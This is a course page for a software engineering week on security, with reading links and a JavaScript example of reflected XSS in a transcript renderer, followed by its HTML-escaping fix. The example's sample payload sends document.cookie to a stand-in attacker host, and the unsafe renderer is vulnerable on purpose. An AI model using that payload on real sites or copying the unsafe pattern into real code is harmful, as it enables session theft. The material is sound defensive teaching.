Last updated: Feb 08, 23 18:46 UTC
Week 10 - Software Engineering and Security
Learning Objectives:
In this week of the course, you will learn to:
- Explain why security is a spectrum rather than a binary property, and define a realistic threat model for a given system
- Evaluate the tradeoffs between security and costs in software engineering
- Recognize the causes of and common mitigations for common vulnerabilities in web applications
- Utilize static analysis tools to identify common weaknesses in code
Lessons:
- Software Engineering + Security slides (PDF, PPT)
For Further Reading:
- “What are Weak Links in the npm Supply Chain?”
- “Why secret detection tools are not enough: It’s not just about false positives - An industrial case study”
- “A comparative study of vulnerability reporting by software composition analysis tools”
- “Practical Automated Detection of Malicious npm Packages”
- HashiCorp Vault
- “OWASP Top 10 Web Security Risks”
- LGTM analysis of transcript server and XSS example on transcript server (This link might be annoying, but is not malicious)
- Software supply-chain vulnerabilities: ESLint 2018 attack, Podcast on SolarWinds attack
- Security awareness/training activity: OWASP Juice Shop, online demo
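The readings above point at an XSS example on the course's transcript server and at static analysis (LGTM) for finding it. The following is an added illustration written for this page, not code from the transcript server, the slides, or any of the linked papers: a transcript renderer that interpolates an attacker-controlled student name straight into HTML, the same renderer with contextual output encoding, and a crude check that shows the injected markup surviving in one and not the other. All function names (renderTranscriptUnsafe, renderTranscriptSafe, escapeHtml, containsScript) and the sample inputs are assumptions made up for the example.

```javascript
'use strict';
// Added example (not from the course's transcript server). Function names and
// sample data below are assumptions constructed for illustration.

// VULNERABLE: untrusted input (the student name, e.g. from a query string) is
// dropped directly into an HTML template string. This is the classic reflected
// XSS sink that CodeQL/LGTM's XSS queries look for: request data flowing to an
// HTML response without sanitization.
function renderTranscriptUnsafe(studentName, courses) {
  const rows = courses
    .map(c => `<tr><td>${c.code}</td><td>${c.grade}</td></tr>`)
    .join('');
  return `<h1>Transcript for ${studentName}</h1><table>${rows}</table>`;
}

// MITIGATION: encode for the HTML-element context. Note this encoder is only
// correct for text placed between tags; attribute values, URLs and inline
// script contexts each need their own encoding rules.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

function renderTranscriptSafe(studentName, courses) {
  const rows = courses
    .map(c => `<tr><td>${escapeHtml(c.code)}</td><td>${escapeHtml(c.grade)}</td></tr>`)
    .join('');
  return `<h1>Transcript for ${escapeHtml(studentName)}</h1><table>${rows}</table>`;
}

// Crude detection used here only to make the difference observable: does a
// literal <script> tag survive in the rendered output? (A real scanner or
// CodeQL query reasons about data flow, not the final string.)
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: a cookie-stealing payload in place of a name.
const payload =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
const sampleCourses = [{ code: 'CS 590', grade: 'A' }];

// Demonstration: the unsafe renderer reflects the payload intact; the safe one
// turns it into inert text.
const unsafeHtml = renderTranscriptUnsafe(payload, sampleCourses);
const safeHtml = renderTranscriptSafe(payload, sampleCourses);
console.log('unsafe contains <script>:', containsScript(unsafeHtml)); // true
console.log('safe contains <script>:  ', containsScript(safeHtml));   // false
```

Two things worth taking from this when you run LGTM/CodeQL over the transcript server: the tool reports the unsanitized flow from request input to the HTML response, not the presence of any particular payload, so fixing it means encoding at the sink for the context the data lands in; and encoding alone is the last line of defense, normally paired with a Content-Security-Policy and a templating engine that escapes by default.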